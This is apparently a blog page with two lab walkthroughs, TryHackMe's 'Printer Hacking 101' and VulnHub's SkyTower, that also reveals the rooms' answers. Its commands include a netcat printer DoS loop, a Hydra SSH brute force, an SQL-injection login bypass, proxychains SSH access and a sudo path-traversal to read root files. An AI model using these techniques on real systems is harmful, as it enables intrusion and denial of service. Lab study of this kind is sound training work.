printer hacking 101 walkthrough ( )

WALKTHROUGH (spoiler) OF PRINTER HACKING 101 by swafox in Try Hack Me  (


Unit 1 introduction


In This section the creator of the room shared some quick info about the famous Pewdiepie hacking. Where the hacker hacked about 50,000 printers and printed a page asking for subscribing to pewdiepie youtube channel 😊



Unit 2 ipp port


The cause of pewdiepie hacking was the open IPP port.

An open IPP port can expose a lot of sensitive information such as printer name, location, model, firmware version, or even printer wifi SSID.

What port does IPP run on?




Unit 3# Targeting and exploitation

In this section we have the deploy button to Deploy the machine

A handy tool for printer exploitation is shared.


The Printer Exploitation Toolkit is a handy tool that is used for both local targeting and exploitation.

There are exactly three options you need to try when exploiting a printer using PRET:

1. ps (Postscript)

2. pjl (Printer Job Language)

3. pcl (Printer Command Language)


You need to try out all three languages just to see which one is going to be understood by the printer. 


A nice cheat sheet:


How would a simple printer TCP DoS attack look as a one-line command?

while true; do nc printer 9100; done

Review the cheat sheet provided in the task reading above. What attack are printers often vulnerable to which involves sending more and more information until a pre-allocated buffer size is surpassed?

Buffer Overflow


Now we need to get access of the system and use the printer.

We will brute force the ssh for password. The username (printer) is given in the local tunneling command.


Hydra -l printer -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh


Once we have the password we will do a local tunneling to access the cups server on port 631 on our local port 3631, for this the following command will be used.

ssh printer@MACHINE_IP -T -L 3631:localhost:631


After the local tunnel is created. We will connect to the cups server on vulnerable machine by browsing localhost:3631

Going to the Printers section, we will find the Fox_Printer and it will give us the answer to the location of the printer.

Connect to the printer per the instructions above. Where's the Fox_Printer located?

Skidy's basement


In order to find the size of the test page, go to the Fox_printer, and print a test page, then goto Jobs section , the test page file size will be mentioned.


What is the size of a test sheet?




vulnhub machine SKYTOWER walkthrough

Vulnhub Machine SkyTower Walkthrough OSCP friendly/ No Metasploit

# Nmap 7.70 scan initiated Thu Aug  8 02:55:03 2019 as: nmap -sC -sV -p- -oN nmap
Nmap scan report for SkyTower (
Host is up (0.0019s latency).
Not shown: 65532 closed ports
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported: GET HEAD
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu Aug  8 02:55:57 2019 -- 1 IP address (1 host up) scanned in 54.69 seconds

We have SSH filtered and a Squid HTTP proxy on port 3128, most probably the SSH is behind proxy, lets check it later. First  the WebServer.
We have login page, so lets try common creds and sqli.
On Trying sqli the server give us an error but also telling us some characters are filtered. Trying multiple characters , the string test’ || 1=1#  worked. So user test@test and password test’ || 1=1#  .

We got login credentials for user john, lets try to use it in ssh.
First of all we need to access ssh through proxy, there are two ways,
One is by using proxytunnel

proxytunnel -p -d -a 1234

Second it by proxychains, by adding the below give in /etc/proxychains.conf
http 3128

proxychains ssh john@

Our session got termed as soon as it was connected.
proxychains ssh john@ /bin/bash

This give us a new bash shell upon connection, first thing to do
Rm .bashrc

So that condition of immediate termination is removed.
Goto /var/www and there are mysql database credentials as root:root.
We can find this out by downloading script via wget and execute it.
Login into mysql by 

Mysql -u root -proot

In Mysql
show databases;
use SkyTech;
show tables;

mysql> select * from login;
| id | email               | password     |
|  1 |    | hereisjohn   |
|  2 |    | ihatethisjob |
|  3 | | senseable    |
3 rows in set (0.01 sec)

Lets login as sara.
proxychains ssh sara@ /bin/bash
ProxyChains-3.1 (
sara@'s password:

uid=1001(sara) gid=1001(sara) groups=1001(sara)

We checked sara’s privileges by sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass,

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

So we can use sudo only for /bin/cat and /accounts/*

sudo /bin/ls /accounts/../root

sudo /bin/cat /accounts/../root/flag.txt

Congratz, have a cold one to celebrate!
root password is theskytower

We have root credentials as root:theskytower.



printer hacking 101 walkthrough ( )

WALKTHROUGH (spoiler) OF PRINTER HACKING 101 by swafox in Try Hack Me   (   Unit 1 introduction   In This section th...